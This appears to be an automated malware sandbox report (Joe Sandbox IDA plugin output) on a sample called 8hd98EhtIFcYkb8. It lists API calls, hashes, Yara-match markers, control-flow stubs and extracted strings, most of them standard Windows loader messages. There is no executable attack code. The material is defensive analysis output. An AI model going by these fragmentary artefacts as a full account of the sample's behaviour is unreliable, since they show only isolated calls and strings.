                                                    • Instruction ID: a3b56bce678a9978b0cf9f15ffb85b210e0b410a7259922702020bbbed34a0a5
                                                    • Opcode Fuzzy Hash: cfe58fc7c74c80d9a1d26f6396d4d685155724621588cfef0b672431f8094675
                                                    • Instruction Fuzzy Hash: 4A11E2B6C003498FDB20CF9AC444ADEFBF4AB88310F54842AD519A7300C779A945CFA5
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,00DBBE6C), ref: 00DBC0A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239905303.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_db0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: ac99e97398dcdb29d0d7dbe2297b8a12f6230e42eea4697d288aa10c015cc9c8
                                                    • Instruction ID: e05e0ee670d9e0a649f114c4ae503287ecb17e8d8cacb09f738ba38baf3f3946
                                                    • Opcode Fuzzy Hash: ac99e97398dcdb29d0d7dbe2297b8a12f6230e42eea4697d288aa10c015cc9c8
                                                    • Instruction Fuzzy Hash: 5E11EFB5C10249CBDB20EF9AC444BDEBBF4EB88314F14842AD859B7200D379A945CFA5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 78a73e8da20d6e5e12b77d75bdd7edbbb21b44a5f4302afe347333dc0d336f4d
                                                    • Instruction ID: 266a64f155a936ba1d6d094ba8e080f9a86ccf8b9ed52b9ef3a1647be09faf97
                                                    • Opcode Fuzzy Hash: 78a73e8da20d6e5e12b77d75bdd7edbbb21b44a5f4302afe347333dc0d336f4d
                                                    • Instruction Fuzzy Hash: C61146B1D003498FDB20DFAAC4457EEBBF4AB98314F14841AD459A7240CB796905CF94
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: a92227ca64860036aa71eb8ee60b0dbce9f35a565532e77f33cbd9338588d72c
                                                    • Instruction ID: 84394153a5c45b6a7fd2f8bd3dc681e02b9d7319c07c3b97d58458dffaf14d07
                                                    • Opcode Fuzzy Hash: a92227ca64860036aa71eb8ee60b0dbce9f35a565532e77f33cbd9338588d72c
                                                    • Instruction Fuzzy Hash: DB1125B1D003498FDB20DFAAC4457AEFBF5AB88224F248419D519A7240CB79A945CFA4
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 026E35D5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 14590aaab3a950de25aaee039a58c3fb7586ca8d24b203f4495db7f51c087272
                                                    • Instruction ID: 7c2c12260145a8da1468e890a1044203b8a10be3dd2c4befab0a9a177bc753d6
                                                    • Opcode Fuzzy Hash: 14590aaab3a950de25aaee039a58c3fb7586ca8d24b203f4495db7f51c087272
                                                    • Instruction Fuzzy Hash: 491116B58003499FCB20CF9AC945BDEFBF8EB48320F108459E558A7340C375A540CFA1
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 026E49E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 7ea456428ba183e5a1ddc3b15be3226aee1a0da953aade2f680603b9983684e7
                                                    • Instruction ID: c7e32b4ec12e9d0942b1eafd70548d043fe257c90de5a228f52270a7ad26dac7
                                                    • Opcode Fuzzy Hash: 7ea456428ba183e5a1ddc3b15be3226aee1a0da953aade2f680603b9983684e7
                                                    • Instruction Fuzzy Hash: F311F2B58003498FDB20DF9AC585BDEBBF4FB48320F20841AD959A7340D779A945CFA5
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 026E35D5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 92ba65db8e02a020939b76b7d54e3fe7bab984312b6853bb2d71ab25382f4ef2
                                                    • Instruction ID: 9967c47a3010411b0d20ecd8b9f8016e727608624638cfebdb41d3a044df7ecd
                                                    • Opcode Fuzzy Hash: 92ba65db8e02a020939b76b7d54e3fe7bab984312b6853bb2d71ab25382f4ef2
                                                    • Instruction Fuzzy Hash: 391103B58003499FDB20DF9AC985BEEBBF8EB48324F10845AE519A7340C375A954CFA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PHq$PHq
                                                    • API String ID: 0-1274609152
                                                    • Opcode ID: 02b066a580775bda62a80563e50e13532625a4dc1bad68d2186b1a4731ba0aff
                                                    • Instruction ID: e56c2f562952cc4be1a225a652cf5da59ebb68f250c007f37ff14bb8a3a0aa0a
                                                    • Opcode Fuzzy Hash: 02b066a580775bda62a80563e50e13532625a4dc1bad68d2186b1a4731ba0aff
                                                    • Instruction Fuzzy Hash: 4CD1A034A01604CFDB18DF69C598BA9B7F6BF8C715F2580A9E406AB361DB31AD41CF60

                                                    Execution Graph

                                                    Execution Coverage:1.2%
                                                    Dynamic/Decrypted Code Coverage:4.5%
                                                    Signature Coverage:7.1%
                                                    Total number of Nodes:154
                                                    Total number of Limit Nodes:12

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 159 417a13-417a2f 160 417a37-417a3c 159->160 161 417a32 call 42e123 159->161 162 417a42-417a50 call 42e643 160->162 163 417a3e-417a41 160->163 161->160 166 417a60-417a71 call 42cae3 162->166 167 417a52-417a5d call 42e8e3 162->167 172 417a73-417a87 LdrLoadDll 166->172 173 417a8a-417a8d 166->173 167->166 172->173
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A85
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8hd98EhtIFcYkb8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 60649801836bbc3b7d335e88a05832327e3b5b3953f5200478c210aca565a30d
                                                    • Instruction ID: 087504ced11ce5ae3600bb80fd07ff88de342a00c403e3ae3b376b9b69f6476f
                                                    • Opcode Fuzzy Hash: 60649801836bbc3b7d335e88a05832327e3b5b3953f5200478c210aca565a30d
                                                    • Instruction Fuzzy Hash: F9015EB1E4020DABDF10DAE1DC42FDEB3789F14304F0441AAF90897241F635EB548B95

                                                    Control-flow Graph

                                                    control_flow_graph 184 42b533-42b56f call 404a13 call 42c5e3 NtClose
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8hd98EhtIFcYkb8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0

                                                    Control-flow Graph

                                                    control_flow_graph 198 12e2b60-12e2b6c LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0

                                                    Control-flow Graph

                                                    control_flow_graph 200 12e2df0-12e2dfc LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0

                                                    Control-flow Graph

                                                    control_flow_graph 199 12e2c70-12e2c7c LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0

                                                    Control-flow Graph

                                                    control_flow_graph 201 12e35c0-12e35cc LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(j77tfG6,00000111,00000000,00000000), ref: 0041409A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8hd98EhtIFcYkb8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: j77tfG6$j77tfG6
                                                    • API String ID: 1836367815-2022874598

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(j77tfG6,00000111,00000000,00000000), ref: 0041409A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8hd98EhtIFcYkb8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: j77tfG6$j77tfG6
                                                    • API String ID: 1836367815-2022874598

                                                    Control-flow Graph

                                                    control_flow_graph 174 42b843-42b884 call 404a13 call 42c5e3 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(?,0041E20B,?,?,00000000,?,0041E20B,?,?,?), ref: 0042B87F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8hd98EhtIFcYkb8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0

                                                    Control-flow Graph

                                                    control_flow_graph 179 42b893-42b8d4 call 404a13 call 42c5e3 RtlFreeHeap
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C7FFFFFF,00000007,00000000,00000004,00000000,004172F4,000000F4,?,?,?,?,?), ref: 0042B8CF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8hd98EhtIFcYkb8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0

                                                    Control-flow Graph

                                                    control_flow_graph 189 42b8e3-42b91f call 404a13 call 42c5e3 ExitProcess
                                                    APIs
                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,893822A4,?,?,893822A4), ref: 0042B91A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8hd98EhtIFcYkb8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0

                                                    Control-flow Graph

                                                    control_flow_graph 194 12e2c0a-12e2c0f 195 12e2c1f-12e2c26 LdrInitializeThunk 194->195 196 12e2c11-12e2c18 194->196
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2160512332
                                                    Strings
                                                    • Critical section address., xrefs: 01315502
                                                    • Thread identifier, xrefs: 0131553A
                                                    • Critical section debug info address, xrefs: 0131541F, 0131552E
                                                    • Critical section address, xrefs: 01315425, 013154BC, 01315534
                                                    • 8, xrefs: 013152E3
                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0131540A, 01315496, 01315519
                                                    • corrupted critical section, xrefs: 013154C2
                                                    • Address of the debug info found in the active list., xrefs: 013154AE, 013154FA
                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013154E2
                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01315543
                                                    • undeleted critical section in freed memory, xrefs: 0131542B
                                                    • double initialized or corrupted critical section, xrefs: 01315508
                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013154CE
                                                    • Invalid debug info address of this critical section, xrefs: 013154B6
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                    • API String ID: 0-2368682639
                                                    Strings
                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01312498
                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01312412
                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01312602
                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 0131261F
                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01312506
                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013124C0
                                                    • @, xrefs: 0131259B
                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013125EB
                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01312624
                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013122E4
                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01312409
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                    • API String ID: 0-4009184096
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                    • API String ID: 0-2515994595
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                    • API String ID: 0-1700792311
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 82$Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$`-$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-505181549
                                                    Strings
                                                    • HandleTraces, xrefs: 01328C8F
                                                    • VerifierDlls, xrefs: 01328CBD
                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01328A3D
                                                    • `-, xrefs: 01328A35, 01328A5F
                                                    • AVRF: -*- final list of providers -*- , xrefs: 01328B8F
                                                    • VerifierDebug, xrefs: 01328CA5
                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01328A67
                                                    • VerifierFlags, xrefs: 01328C50
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags$`-
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$`-$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                    Strings
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01312178
                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0131219F
                                                    • SXS: %s() passed the empty activation context, xrefs: 01312165
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01312180
                                                    • RtlGetAssemblyStorageRoot, xrefs: 01312160, 0131219A, 013121BA
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013121BF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 012DC6C3
                                                    • LdrpInitializeImportRedirection, xrefs: 01318177, 013181EB
                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 013181E5
                                                    • Loading import redirection DLL: '%wZ', xrefs: 01318170
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01318181, 013181F5
                                                    • LdrpInitializeProcess, xrefs: 012DC6C4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                    APIs
                                                      • Part of subcall function 012E2DF0: LdrInitializeThunk.NTDLL ref: 012E2DFA
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0BA3
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0BB6
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0D60
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0D74
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                    • String ID:
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 012D8421
                                                    • LdrpInitializeProcess, xrefs: 012D8422
                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 012D855E
                                                    • @, xrefs: 012D8591
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                    Strings
                                                    • SXS: %s() passed the empty activation context, xrefs: 013121DE
                                                    • .Local, xrefs: 012D28D8
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013122B6
                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013121D9, 013122B1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                    Strings
                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 013010AE
